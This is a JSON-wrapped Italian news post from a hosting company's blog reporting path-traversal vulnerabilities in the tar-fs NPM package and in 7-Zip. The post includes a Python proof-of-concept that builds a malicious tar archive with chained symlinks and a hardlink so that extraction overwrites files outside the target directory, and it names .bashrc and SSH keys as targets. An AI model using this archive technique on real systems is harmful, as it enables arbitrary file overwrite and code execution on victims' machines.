{"id":140951,"date":"2025-08-18T11:12:07","date_gmt":"2025-08-18T09:12:07","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/uyazvimosti-v-tar-fs-i-7-zip-pozvolyayushhie-zapisat-fajly-za-predely-bazovogo-kataloga"},"modified":"2025-08-18T11:12:07","modified_gmt":"2025-08-18T09:12:07","slug":"uyazvimosti-v-tar-fs-i-7-zip-pozvolyayushhie-zapisat-fajly-za-predely-bazovogo-kataloga","status":"publish","type":"post","link":"https:\/\/prohoster.info\/it\/blog\/news\/uyazvimosti-v-tar-fs-i-7-zip-pozvolyayushhie-zapisat-fajly-za-predely-bazovogo-kataloga","title":{"rendered":"Vulnerabilit\u00e0 in tar-fs e 7-Zip, che consentono di scrivere file al di fuori della directory di base","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Nel pacchetto NPM tar-fs \u00e8 stata identificata una vulnerabilit\u00e0 (CVE-2025-48387) che consente, durante l'estrazione di un archivio tar appositamente formattato, di scrivere file in qualsiasi parte del file system, senza limitazioni alla directory di destinazione (a seconda dei diritti di accesso dell'utente corrente). La vulnerabilit\u00e0 pu\u00f2 anche essere sfruttata per sovrascrivere file esistenti, ad esempio, file come &#171;.ssh\/id_rsa&#187; o &#171;.bashrc&#187; nella home directory dell'utente possono essere sovrascritti per eseguire codice malevolo nel sistema.    <\/p>\n<p>La questione \u00e8 stata classificata con livello di rischio critico, considerando che il pacchetto tar-fs ha 23 milioni di download settimanali ed \u00e8 utilizzato come dipendenza in 1155 progetti. La vulnerabilit\u00e0 \u00e8 stata risolta nelle versioni 3.0.9, 2.1.3 e 1.16.5, rilasciate a maggio, ma le informazioni sulla vulnerabilit\u00e0 sono state divulgate solo quasi tre mesi dopo.     <\/p>\n<p>La vulnerabilit\u00e0 \u00e8 causata da controlli insufficienti sui link simbolici e rigidi presenti nell'archivio, per verificare se oltrepassano la directory di destinazione per l'estrazione. Per eludere i controlli, vengono utilizzati due link simbolici: il primo punta alla directory radice dell'archivio in estrazione (&#171;.&#187;), e il secondo \u00e8 creato relativamente al primo link simbolico e utilizza caratteri &#171;..&#187; nel nome per oltrepassare la directory base. Ad esempio, il primo link &#171;noop\/noop\/noop&#187; punta a &#171;.&#187;, mentre il secondo &#171;noop\/noop\/noop\/....\/....\/..&#187; si traduce come &#171;.\/....\/....\/&#187;. Per organizzare la sovrascrittura dei file nell'archivio, pu\u00f2 essere creato un link rigido che punta a un file esterno rispetto al secondo link simbolico.       import tarfile  import io  with tarfile.open(&#171;poc.tar&#187;, mode=&#187;x&#187;) as tar:      root = tarfile.TarInfo(&#171;root&#187;)      root.linkname = (&#171;noop\/&#187; * 15) + (&#171;..&#187; * 15)      root.type = tarfile.SYMTYPE      tar.addfile(root)      noop = tarfile.TarInfo(&#171;noop&#187;)      noop.linkname = &#171;.&#187;      noop.type = tarfile.SYMTYPE      tar.addfile(noop)      hard = tarfile.TarInfo(&#171;hardflag&#187;)      hard.linkname = &#171;root\/home\/username\/flag\/flag&#187;      hard.type = tarfile.LNKTYPE      tar.addfile(hard)      content = b&#187;overwrite\n&#187;      overwrite = tarfile.TarInfo(&#171;hardflag&#187;)      overwrite.size = len(content)      overwrite.type = tarfile.REGTYPE      tar.addfile(overwrite, fileobj=io.BytesIO(content))      content = b&#187;new!\n&#187;      newfile = tarfile.TarInfo(&#171;root\/home\/username\/flag\/newfile&#187;)      newfile.size = len(content)      newfile.type = tarfile.REGTYPE      tar.addfile(newfile, fileobj=io.BytesIO(content))            <\/p>\n<p>Una vulnerabilit\u00e0 simile (CVE-2025-55188) \u00e8 stata identificata nell'archiviatore 7-Zip. Anche in 7-Zip, file possono essere scritti al di fuori della directory base utilizzando link simbolici che contengono la sequenza &#171;..&#187; nel percorso del file. Il problema pu\u00f2 essere sfruttato durante l'estrazione con 7-Zip di qualsiasi archivio che supporti link simbolici, come zip, tar, 7z e rar. Il problema \u00e8 stato risolto nella versione 7-Zip 25.01.<br \/>\n<br \/>Fonte: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=63740\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0412 NPM-\u043f\u0430\u043a\u0435\u0442\u0435 tar-fs \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2025-48387), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u0438 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u043e\u0433\u043e tar-\u0430\u0440\u0445\u0438\u0432\u0430 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0432 \u043b\u044e\u0431\u044b\u0435 \u0447\u0430\u0441\u0442\u0438 \u0424\u0421, \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u043c, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430 (\u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u0440\u0430\u0432\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f). \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0434\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0435\u0433\u043e \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u0430\u043d\u044b \u0444\u0430\u0439\u043b\u044b &#171;.ssh\/id_rsa&#187; \u0438\u043b\u0438 &#171;.bashrc&#187; \u0432 [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-140951","post","type-post","status-publish","format-standard","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0412 NPM-\u043f\u0430\u043a\u0435\u0442\u0435 tar-fs \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2025-48387), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u0438 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u043e\u0433\u043e tar-\u0430\u0440\u0445\u0438\u0432\u0430 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0432 \u043b\u044e\u0431\u044b\u0435 \u0447\u0430\u0441\u0442\u0438 \u0424\u0421, \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u043c, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/it\/blog\/news\/uyazvimosti-v-tar-fs-i-7-zip-pozvolyayushhie-zapisat-fajly-za-predely-bazovogo-kataloga\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"it_IT\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 tar-fs \u0438 7-Zip, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0431\u0430\u0437\u043e\u0432\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0412 NPM-\u043f\u0430\u043a\u0435\u0442\u0435 tar-fs \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2025-48387), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u0438 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u043e\u0433\u043e tar-\u0430\u0440\u0445\u0438\u0432\u0430 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0432 \u043b\u044e\u0431\u044b\u0435 \u0447\u0430\u0441\u0442\u0438 \u0424\u0421, \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u043c, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/it\/blog\/news\/uyazvimosti-v-tar-fs-i-7-zip-pozvolyayushhie-zapisat-fajly-za-predely-bazovogo-kataloga\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2025-08-18T09:12:07+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2025-08-18T09:12:07+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Vulnerabilit\u00e0 in tar-fs e 7-Zip che consentono di scrivere file al di fuori della directory principale | ProHoster","description":"Nel pacchetto NPM tar-fs \u00e8 stata rilevata una vulnerabilit\u00e0 (CVE-2025-48387) che consente, durante l'estrazione di un archivio tar appositamente formattato, di scrivere file in qualsiasi parte del filesystem, senza limitazioni alla directory in cui si sta effettuando l'estrazione.","canonical_url":"https:\/\/prohoster.info\/it\/blog\/news\/uyazvimosti-v-tar-fs-i-7-zip-pozvolyayushhie-zapisat-fajly-za-predely-bazovogo-kataloga","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"it_IT","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 tar-fs \u0438 7-Zip, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0431\u0430\u0437\u043e\u0432\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 | ProHoster","og:description":"\u0412 NPM-\u043f\u0430\u043a\u0435\u0442\u0435 tar-fs \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2025-48387), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u0438 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u043e\u0433\u043e tar-\u0430\u0440\u0445\u0438\u0432\u0430 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0432 \u043b\u044e\u0431\u044b\u0435 \u0447\u0430\u0441\u0442\u0438 \u0424\u0421, \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u044b\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u043c, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430.","og:url":"https:\/\/prohoster.info\/it\/blog\/news\/uyazvimosti-v-tar-fs-i-7-zip-pozvolyayushhie-zapisat-fajly-za-predely-bazovogo-kataloga","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2025-08-18T09:12:07+00:00","article:modified_time":"2025-08-18T09:12:07+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"140951","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-23 14:20:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2026-01-23 14:20:20","updated":"2026-01-23 14:20:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/posts\/140951","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/comments?post=140951"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/posts\/140951\/revisions"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/media?parent=140951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/categories?post=140951"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/it\/wp-json\/wp\/v2\/tags?post=140951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}